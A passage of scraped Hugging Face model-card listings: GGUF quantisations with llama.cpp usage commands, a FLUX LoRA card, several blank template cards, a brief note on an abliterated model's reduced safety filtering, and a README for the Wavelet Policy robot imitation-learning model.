{\url{https://github.com/huggingface/trl}} } ```
Triangle104/Huihui-MoE-1B-A0.6B-Q6_K-GGUF
Triangle104
2025-06-11T10:31:45Z
0
0
transformers
[ "transformers", "gguf", "moe", "llama-cpp", "gguf-my-repo", "text-generation", "base_model:huihui-ai/Huihui-MoE-1B-A0.6B", "base_model:quantized:huihui-ai/Huihui-MoE-1B-A0.6B", "license:apache-2.0", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T10:31:38Z
--- license: apache-2.0 base_model: huihui-ai/Huihui-MoE-1B-A0.6B library_name: transformers license_link: https://huggingface.co/Qwen/Qwen3-0.6B/blob/main/LICENSE pipeline_tag: text-generation tags: - moe - llama-cpp - gguf-my-repo --- # Triangle104/Huihui-MoE-1B-A0.6B-Q6_K-GGUF This model was converted to GGUF format from [`huihui-ai/Huihui-MoE-1B-A0.6B`](https://huggingface.co/huihui-ai/Huihui-MoE-1B-A0.6B) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space. Refer to the [original model card](https://huggingface.co/huihui-ai/Huihui-MoE-1B-A0.6B) for more details on the model. ## Use with llama.cpp Install llama.cpp through brew (works on Mac and Linux) ```bash brew install llama.cpp ``` Invoke the llama.cpp server or the CLI. ### CLI: ```bash llama-cli --hf-repo Triangle104/Huihui-MoE-1B-A0.6B-Q6_K-GGUF --hf-file huihui-moe-1b-a0.6b-q6_k.gguf -p "The meaning to life and the universe is" ``` ### Server: ```bash llama-server --hf-repo Triangle104/Huihui-MoE-1B-A0.6B-Q6_K-GGUF --hf-file huihui-moe-1b-a0.6b-q6_k.gguf -c 2048 ``` Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well. Step 1: Clone llama.cpp from GitHub. ``` git clone https://github.com/ggerganov/llama.cpp ``` Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux). ``` cd llama.cpp && LLAMA_CURL=1 make ``` Step 3: Run inference through the main binary. ``` ./llama-cli --hf-repo Triangle104/Huihui-MoE-1B-A0.6B-Q6_K-GGUF --hf-file huihui-moe-1b-a0.6b-q6_k.gguf -p "The meaning to life and the universe is" ``` or ``` ./llama-server --hf-repo Triangle104/Huihui-MoE-1B-A0.6B-Q6_K-GGUF --hf-file huihui-moe-1b-a0.6b-q6_k.gguf -c 2048 ```
neurospin/resnet18-stl10
neurospin
2025-06-11T10:30:27Z
0
0
null
[ "license:other", "region:us" ]
null
2025-06-11T08:51:57Z
--- license: other license_name: cecill-b license_link: https://cecill.info/licences.fr.html --- Weights used in the "Self-Supervised Contrastive Learning with SimCLR" nidl tutorial.
ssanidhya0407/newsviallm-embeddings
ssanidhya0407
2025-06-11T10:28:36Z
0
0
null
[ "license:apache-2.0", "region:us" ]
null
2025-06-11T10:27:18Z
--- license: apache-2.0 ---
Triangle104/Huihui-MoE-1B-A0.6B-Q4_K_S-GGUF
Triangle104
2025-06-11T10:28:36Z
0
0
transformers
[ "transformers", "gguf", "moe", "llama-cpp", "gguf-my-repo", "text-generation", "base_model:huihui-ai/Huihui-MoE-1B-A0.6B", "base_model:quantized:huihui-ai/Huihui-MoE-1B-A0.6B", "license:apache-2.0", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T10:28:24Z
--- license: apache-2.0 base_model: huihui-ai/Huihui-MoE-1B-A0.6B library_name: transformers license_link: https://huggingface.co/Qwen/Qwen3-0.6B/blob/main/LICENSE pipeline_tag: text-generation tags: - moe - llama-cpp - gguf-my-repo --- # Triangle104/Huihui-MoE-1B-A0.6B-Q4_K_S-GGUF This model was converted to GGUF format from [`huihui-ai/Huihui-MoE-1B-A0.6B`](https://huggingface.co/huihui-ai/Huihui-MoE-1B-A0.6B) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space. Refer to the [original model card](https://huggingface.co/huihui-ai/Huihui-MoE-1B-A0.6B) for more details on the model. ## Use with llama.cpp Install llama.cpp through brew (works on Mac and Linux) ```bash brew install llama.cpp ``` Invoke the llama.cpp server or the CLI. ### CLI: ```bash llama-cli --hf-repo Triangle104/Huihui-MoE-1B-A0.6B-Q4_K_S-GGUF --hf-file huihui-moe-1b-a0.6b-q4_k_s.gguf -p "The meaning to life and the universe is" ``` ### Server: ```bash llama-server --hf-repo Triangle104/Huihui-MoE-1B-A0.6B-Q4_K_S-GGUF --hf-file huihui-moe-1b-a0.6b-q4_k_s.gguf -c 2048 ``` Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well. Step 1: Clone llama.cpp from GitHub. ``` git clone https://github.com/ggerganov/llama.cpp ``` Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux). ``` cd llama.cpp && LLAMA_CURL=1 make ``` Step 3: Run inference through the main binary. ``` ./llama-cli --hf-repo Triangle104/Huihui-MoE-1B-A0.6B-Q4_K_S-GGUF --hf-file huihui-moe-1b-a0.6b-q4_k_s.gguf -p "The meaning to life and the universe is" ``` or ``` ./llama-server --hf-repo Triangle104/Huihui-MoE-1B-A0.6B-Q4_K_S-GGUF --hf-file huihui-moe-1b-a0.6b-q4_k_s.gguf -c 2048 ```
BootesVoid/cmbrrit13048gh4x52lbb2qmx_cmbrrr8xs048vh4x5hco75vyp
BootesVoid
2025-06-11T10:26:42Z
0
0
diffusers
[ "diffusers", "flux", "lora", "replicate", "text-to-image", "en", "base_model:black-forest-labs/FLUX.1-dev", "base_model:adapter:black-forest-labs/FLUX.1-dev", "license:other", "region:us" ]
text-to-image
2025-06-11T10:26:40Z
--- license: other license_name: flux-1-dev-non-commercial-license license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md language: - en tags: - flux - diffusers - lora - replicate base_model: "black-forest-labs/FLUX.1-dev" pipeline_tag: text-to-image # widget: # - text: >- # prompt # output: # url: https://... instance_prompt: OS11 --- # Cmbrrit13048Gh4X52Lbb2Qmx_Cmbrrr8Xs048Vh4X5Hco75Vyp <Gallery /> ## About this LoRA This is a [LoRA](https://replicate.com/docs/guides/working-with-loras) for the FLUX.1-dev text-to-image model. It can be used with diffusers or ComfyUI. It was trained on [Replicate](https://replicate.com/) using AI toolkit: https://replicate.com/ostris/flux-dev-lora-trainer/train ## Trigger words You should use `OS11` to trigger the image generation. ## Run this LoRA with an API using Replicate ```py import replicate input = { "prompt": "OS11", "lora_weights": "https://huggingface.co/BootesVoid/cmbrrit13048gh4x52lbb2qmx_cmbrrr8xs048vh4x5hco75vyp/resolve/main/lora.safetensors" } output = replicate.run( "black-forest-labs/flux-dev-lora", input=input ) for index, item in enumerate(output): with open(f"output_{index}.webp", "wb") as file: file.write(item.read()) ``` ## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers) ```py from diffusers import AutoPipelineForText2Image import torch pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda') pipeline.load_lora_weights('BootesVoid/cmbrrit13048gh4x52lbb2qmx_cmbrrr8xs048vh4x5hco75vyp', weight_name='lora.safetensors') image = pipeline('OS11').images[0] ``` For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters) ## Training details - Steps: 2000 - Learning rate: 0.0004 - LoRA rank: 16 ## Contribute your own examples You can use the [community tab](https://huggingface.co/BootesVoid/cmbrrit13048gh4x52lbb2qmx_cmbrrr8xs048vh4x5hco75vyp/discussions) to add images that show off what you’ve made with this LoRA.
barryallen16/Qwen2_5_0B_java_vul
barryallen16
2025-06-11T10:26:38Z
0
0
transformers
[ "transformers", "safetensors", "text-generation-inference", "unsloth", "qwen2", "trl", "en", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-06-11T10:26:07Z
--- base_model: unsloth/qwen2.5-coder-0.5b-instruct-bnb-4bit tags: - text-generation-inference - transformers - unsloth - qwen2 - trl license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** barryallen16 - **License:** apache-2.0 - **Finetuned from model :** unsloth/qwen2.5-coder-0.5b-instruct-bnb-4bit This qwen2 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
Rif010/mmgpt-burmese-fine-tuned-adapter-v2
Rif010
2025-06-11T10:26:20Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-06-11T10:26:13Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q5_K_S-GGUF
Triangle104
2025-06-11T10:22:31Z
0
0
transformers
[ "transformers", "gguf", "moe", "llama-cpp", "gguf-my-repo", "text-generation", "base_model:huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated", "base_model:quantized:huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated", "license:apache-2.0", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T10:22:24Z
--- license: apache-2.0 base_model: huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated library_name: transformers license_link: https://huggingface.co/Qwen/Qwen3-0.6B/blob/main/LICENSE pipeline_tag: text-generation tags: - moe - llama-cpp - gguf-my-repo extra_gated_prompt: '**Usage Warnings** “**Risk of Sensitive or Controversial Outputs**“: This model’s safety filtering has been significantly reduced, potentially generating sensitive, controversial, or inappropriate content. Users should exercise caution and rigorously review generated outputs. “**Not Suitable for All Audiences**:“ Due to limited content filtering, the model’s outputs may be inappropriate for public settings, underage users, or applications requiring high security. “**Legal and Ethical Responsibilities**“: Users must ensure their usage complies with local laws and ethical standards. Generated content may carry legal or ethical risks, and users are solely responsible for any consequences. “**Research and Experimental Use**“: It is recommended to use this model for research, testing, or controlled environments, avoiding direct use in production or public-facing commercial applications. “**Monitoring and Review Recommendations**“: Users are strongly advised to monitor model outputs in real-time and conduct manual reviews when necessary to prevent the dissemination of inappropriate content. “**No Default Safety Guarantees**“: Unlike standard models, this model has not undergone rigorous safety optimization. huihui.ai bears no responsibility for any consequences arising from its use.' --- # Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q5_K_S-GGUF This model was converted to GGUF format from [`huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated`](https://huggingface.co/huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space. Refer to the [original model card](https://huggingface.co/huihui-ai/Huihui-MoE-1.3B-A0.6B-abliterated) for more details on the model. ## Use with llama.cpp Install llama.cpp through brew (works on Mac and Linux) ```bash brew install llama.cpp ``` Invoke the llama.cpp server or the CLI. ### CLI: ```bash llama-cli --hf-repo Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q5_K_S-GGUF --hf-file huihui-moe-1.3b-a0.6b-abliterated-q5_k_s.gguf -p "The meaning to life and the universe is" ``` ### Server: ```bash llama-server --hf-repo Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q5_K_S-GGUF --hf-file huihui-moe-1.3b-a0.6b-abliterated-q5_k_s.gguf -c 2048 ``` Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well. Step 1: Clone llama.cpp from GitHub. ``` git clone https://github.com/ggerganov/llama.cpp ``` Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux). ``` cd llama.cpp && LLAMA_CURL=1 make ``` Step 3: Run inference through the main binary. ``` ./llama-cli --hf-repo Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q5_K_S-GGUF --hf-file huihui-moe-1.3b-a0.6b-abliterated-q5_k_s.gguf -p "The meaning to life and the universe is" ``` or ``` ./llama-server --hf-repo Triangle104/Huihui-MoE-1.3B-A0.6B-abliterated-Q5_K_S-GGUF --hf-file huihui-moe-1.3b-a0.6b-abliterated-q5_k_s.gguf -c 2048 ```
LT3/definitions-oxford-llama-8B-instruct
LT3
2025-06-11T10:20:18Z
0
0
null
[ "safetensors", "text-generation", "en", "arxiv:1910.09700", "base_model:unsloth/Meta-Llama-3.1-8B-Instruct", "base_model:finetune:unsloth/Meta-Llama-3.1-8B-Instruct", "license:mit", "region:us" ]
text-generation
2025-06-10T11:59:33Z
--- license: mit language: - en base_model: - unsloth/Meta-Llama-3.1-8B-Instruct pipeline_tag: text-generation --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> This modelcard aims to be a base template for new models. It has been generated using [this raw template](https://github.com/huggingface/huggingface_hub/blob/main/src/huggingface_hub/templates/modelcard_template.md?plain=1). ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
lurenjia384/wavelet_policy_model
lurenjia384
2025-06-11T10:19:53Z
0
1
null
[ "arxiv:2504.04991", "region:us" ]
null
2025-04-08T09:56:40Z
<a name="readme-top"></a> <br /> <div align="center"> <a href="https://github.com/lurenjia384/Wavelet_Policy"> <img src="images/logo.png" alt="Logo" width="100" height="100"> </a> <h3 align="center">Wavelet Policy</h3> <p align="center"> Imitation Policy Learning in the Frequency Domain with Wavelet Transforms <br /> <a href="https://youtu.be/WnUJzu8MQBk">Quick-Start Demo</a> · <a href="https://arxiv.org/abs/2504.04991">Paper on arXiv</a> · <a href="https://www.youtube.com/watch?v=ak8riKGEG0s">Presentation Video</a> </p> </div> # Wavelet Policy <p align="center"><img src="images/head.png" width="95%"/></p> > 🔍 **Abstract:** > Most imitation learning policies treat the problem as a time-series prediction task, directly mapping high-dimensional observations—such as visual input and proprioception—into action space. While time-series methods focus on spatial-domain modeling, they often overlook inherent temporal patterns in action sequences. To address this, we recast imitation learning policies in the frequency domain and propose **Wavelet Policy**. Our approach applies discrete wavelet transforms (WT) for feature preprocessing, then uses a Single-Encoder-Multiple-Decoder (SE2MD) architecture to extract multi-scale frequency-domain features. To further enrich feature mapping and boost capacity, we insert a Learnable Frequency-Domain Filter (LFDF) after each frequency decoder, improving robustness under varying visual conditions. Experiments show that Wavelet Policy outperforms state-of-the-art end-to-end methods by over 10 % across four challenging robotic-arm tasks while keeping model size comparable. In long-horizon settings, its performance degrades more gracefully as task complexity increases. The code will be released publicly. --- ## 📝 Striving for a Simple and Efficient Embodied Intelligence Model <p align="center"><img src="images/model.png" width="95%"/></p> --- ## 💻 System Requirements | Component | Requirement | | ---------------- | ---------------------------------------- | | Operating System | Ubuntu 20.04 | | GPU Memory | Training: ≥ 4 GB; Inference: ≥ 2 GB | | Disk Space | 100–200 GB (datasets) | | GPU Support | NVIDIA GPU with CUDA support recommended | > 📌 For detailed hardware specs, see the “Experimental Setup” section in the paper. --- ## ⚙️ Environment Configuration We recommend using a `conda` environment. Quick install steps: ```bash git clone https://github.com/lurenjia384/Wavelet_Policy cd Wavelet_Policy # Create conda environment conda create -n Wavelet_Policy python=3.7.16 -y conda activate Wavelet_Policy # Install dependencies pip install -r requirements.txt ``` --- ## 📁 Project Structure ```bash Wavelet_Policy/ ├── images # Images for GitHub display ├── pre_model # Pretrained models ├── log # Log files ├── assets # Robot fixtures or CAD assets ├── pytorch_wavelets # Wavelet transform utilities ├── vid_path # Saved inference videos ├── infer.py # Inference script ├── model.py # Network definitions ├── utils.py # Configuration and helper code ├── requirements.txt # Python dependencies ├── LICENSE └── README.md ``` --- ## 🔗 Pre-trained Model Download Pre-trained weights and configurations are available on Hugging Face: 👉 [WaveletPolicy-base](https://huggingface.co/lurenjia384/wavelet_policy_model) | Cameras | Dataset | Params (M) | Download (closed) | | :-----: | :----------------: | :--------: | :------------------------------------------------------------------------------------------------------------------------------- | | One | Transfer Cube | 17.22 | [best\_model\_11.pt](https://huggingface.co/lurenjia384/wavelet_policy_model/resolve/main/task_1/best_model_11.pt?download=true) | | Two | Transfer Cube | — | coming soon | | One | Bimanual Insertion | 17.22 | coming soon | | Two | Bimanual Insertion | — | coming soon | | One | Transfer Plus | 17.22 | [best\_model\_13.pt](https://huggingface.co/lurenjia384/wavelet_policy_model/resolve/main/task_3/best_model_13.pt?download=true) | | Two | Transfer Plus | — | coming soon | | One | Stack Two Blocks | 17.22 | coming soon | | Two | Stack Two Blocks | — | coming soon | After downloading, place the model files under: ``` Wavelet_Policy/ ├── pre_model ``` You can also load models directly with `huggingface_hub` (no need for `--netdir` or `--stats_path`): ```python from huggingface_hub import hf_hub_download model_path = hf_hub_download( repo_id="lurenjia384/wavelet_policy_model", filename="task_3/best_model_13.pt" ) stats_path = hf_hub_download( repo_id="lurenjia384/wavelet_policy_model", filename="task_3/task_3.pkl" ) ``` --- ## 🚀 Quick Start **Run inference:** ```bash python infer.py --task_name {task_name} \ --stats_path {data_pkl_path.pkl} \ --netdir {model_path.pt} \ --no_visualization {0|1} ``` **Example:** Transfer Plus task, with visualization enabled: ```bash python infer.py --task_name sim_transfer_cube_scripted_plus --no_visualization 0 ``` If there are still difficulties, you can refer to the demonstration video[Quick-Start Demo](https://youtu.be/WnUJzu8MQBk). Other valid values for `--task_name` are: * `sim_transfer_cube_scripted` — Transfer Cube * `sim_insertion_scripted` — Bimanual Insertion * `Put` — Stack Two Blocks **Train the model:** Coming soon… --- ## 📊 Experimental Results **Table:** Success rates (%) of Wavelet Policy vs. five baselines across four tasks and three stages | Model | TC-1 | TC-2 | TC-3 | BI-1 | BI-2 | BI-3 | TP-1 | TP-2 | TP-3 | ST-1 | ST-2 | ST-3 | | --------- | -----: | -----: | -----: | -----: | -----: | -----: | -----: | -----: | -----: | -----: | -----: | -----: | | DP (DDIM) | 9 | 6 | 4 | 4 | 3 | 1 | 2 | 1 | 1 | 1 | 1 | 1 | | ACT | 98 | 96 | 94 | 81 | 73 | 68 | 66 | 57 | 57 | 85 | 67 | 50 | | NL-ACT | 94 | 91 | 90 | 83 | 74 | 70 | 62 | 55 | 55 | 82 | 65 | 48 | | HACT-Vq | 98 | 98 | 97 | 87 | 82 | 76 | **79** | 68 | 68 | 90 | 76 | 55 | | InterACT | **98** | 88 | 82 | **88** | 78 | 44 | — | — | — | — | — | — | | Ours | 98 | **98** | **97** | 87 | **82** | **78** | 78 | **70** | **70** | **96** | **79** | **59** | > **Note:** Bold entries denote the best performance in each column. > `—` indicates no experiment for that method. > `TC`: Transfer Cube; `BI`: Bimanual Insertion; `TP`: Transfer Plus; `ST`: Stack Two Blocks. > The number after each task name indicates the stage. > See the paper for full experimental details. --- ## 📬 Contact If you encounter any issues, please open an [issue](https://github.com/lurenjia384/Wavelet_Policy/issues) or email the author: * 📧 [[email protected]](mailto:[email protected]) As mentioned in the paper’s conclusion, we will continue to improve the model and advance real-robot validation ⭐. We welcome feedback and collaboration opportunities 📫. --- ## ❤️ Acknowledgments We gratefully acknowledge the following resources and contributors: 1. **[DISCOVER Robotics](https://air.tsinghua.edu.cn/info/1147/2175.htm)** — An open platform for Embodied Artificial Intelligence research. 2. **[ACT](https://github.com/tonyzhaozh/act)** — Used for baseline data generation. 3. **[pytorch\_wavelets](https://github.com/fbcotter/pytorch_wavelets)** — Wavelet transform utilities. 4. **[ZJU](https://pi.zju.edu.cn/)** — Support from the graduate school. 5. **[ZJUT](https://ie.zjut.edu.cn/)** — Support from my alma mater. Special thanks to my senior colleagues and advisor for their guidance and contributions. Thanks to all contributors and supporters who help us improve this project! --- ## 🔗 BibTeX Citation ```bibtex @article{yang2025wavelet, title = {Wavelet Policy: Imitation Policy Learning in Frequency Domain with Wavelet Transforms}, author = {Yang, Changchuan and Dong, Yuhang and Tian, Guanzhong and Ge, Haizhou and Zhu, Hongrui}, journal = {arXiv preprint arXiv:2504.04991}, year = {2025} } ```
vijayakumaran92/Unmodel_Male_10
vijayakumaran92
2025-06-11T10:19:32Z
0
0
null
[ "license:cc-by-nc-nd-4.0", "region:us" ]
null
2025-06-11T10:06:20Z
--- license: cc-by-nc-nd-4.0 ---
AIPlans/Qwen-HHH-Sans-Eng
AIPlans
2025-06-11T10:19:15Z
0
0
transformers
[ "transformers", "safetensors", "qwen2", "text-generation", "trl", "sft", "conversational", "arxiv:1910.09700", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T09:38:10Z
--- library_name: transformers tags: - trl - sft --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental 